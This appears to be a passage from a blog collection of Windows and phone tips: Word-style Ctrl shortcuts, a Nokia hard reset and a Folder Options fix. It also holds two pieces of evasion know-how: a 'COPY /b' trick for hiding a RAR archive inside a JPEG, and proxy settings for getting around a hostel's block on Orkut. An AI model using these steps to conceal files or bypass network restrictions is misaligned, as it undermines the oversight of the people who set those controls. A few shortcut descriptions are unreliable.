One of the keys whose importance may have gone unnoticed by most of us is the Control key (Ctrl). The Control key in combination with the 26 alphabet keys can make a lot of our work easier than we think. The following pair of keys can come in handy when we want tasks faster than while using the mouse.
Operations that can be performed on the text selected:-
30. CTRL+ A Select all
31. CTRL+ B Bold
32. CTRL+ C Copy
33. CTRL+ E Justify center
34. CTRL+ I Italics
35. CTRL+ J Justify full
36. CTRL+ L Justify Left
37. CTRL+ M Indent
38. CTRL+ Q Remove paragraph Formatting
39. CTRL+ R Justify right
40. CTRL+ T Margin release
41. CTRL+ U Underline
These keys combos can be used to do other operations:-
42. CTRL+ D Opens Font Dialog Box
43. CTRL+ F Find
44. CTRL+ G Go to page, section, line, heading etc
45. CTRL+ H Find and replace
46. CTRL+ K Insert Hyperlink
47. CTRL+ N Open a new document
48. CTRL+ O Open an existing document
49. CTRL+ S Save
50 CTRL+ W Close an existing document
51. CTRL+ Y Redo
52. CTRL+ Z Undo
Besides the alphabet keys, a combination of other keys also helps:-
53. CTRL+ LEFT ARROW Jumps one word left
54. CTRL+ RIGHT ARROW Jumps one word right
55. CTRL+ DOWN ARROW Jumps one para down
56. CTRL+ UP ARROW Jumps one para up
57. CTRL+ BACKSPACE Delete one word left
58. CTRL+ DELETE Delete one word right
59. CTRL+ PAGE UP To the beginning of the previous page
60. CTRL+ PAGE DOWN to the beginning of the next page
61. CTRL+ P Print Dialog box

Hide your files in images

Hide Your Files In An Image
All you need is WinRAR INSTALLED ON Windows XP.

Gather all your files

Now add those files in a RAR Archive
For example Secret.rar

Now copy the RaR file to a folder.
For Example : C:/hidden/

Now copy any image which is in JPEG format to the same folder above.
For Example logo.jpg

Now Open MS-DOS
Start > Run type "cmd" without quotes.


change it to C:/Hidden/
type "cd\" without quotes.
then type "cd hidden" without quotes.

then type this
COPY /b logo.jpg + secret.rar output.jpg

Now you will see a output.jpg in that "C:\Hidden\" folder.

Now only winrar can open it.
Right click on output.jpg and open with winrar, you will see ur hidden files

orkut proxy

when u in hostel and orkut is banned there then...

connect net,,now
go to internet explorer/tools/connection/lan setting
in proxy server tick "use a proxy for ur lan"
address-- 192.168.0.6
port----- 8090
tick "bypass proxy server for local addresses"
click advance tick "use the proxy server for all protocols"



go to mozzila firefox..
tools/option/advance/network/setting(connection)
click on manual proxy config:
http proxy: 192.168.0.6
port: 8090
tick "use this proxy server for all protocols"
ok


u r done

Hard format nokia mobile

This will fully format your phone , you will lose everything:

1. Switch off the phone.

2. Hold down the following three buttons: Green (call answer button, * button, and '3' button.

3. While holding these buttons, press the power button and switch on the phone.

4. When the message 'Formatting' appears on the screen, release all of the buttons.

FOLDER OPTIONS ARE MISSING

Many times we find that the folder options missing in windows explorer

Here is the solution for that
Open Run and then type "gpedit.msc".
Now goto
User Configuration > Administrative templates > Windows Component > Windows Explorer.

Click on Windows Explorer you will find the 3rd option on the right side of screen
"Removes the Folder Option menu item from the Tools menu"

Just check it,

if it is not configured then change it to enable by double clicking on it and after applying again set it to not configured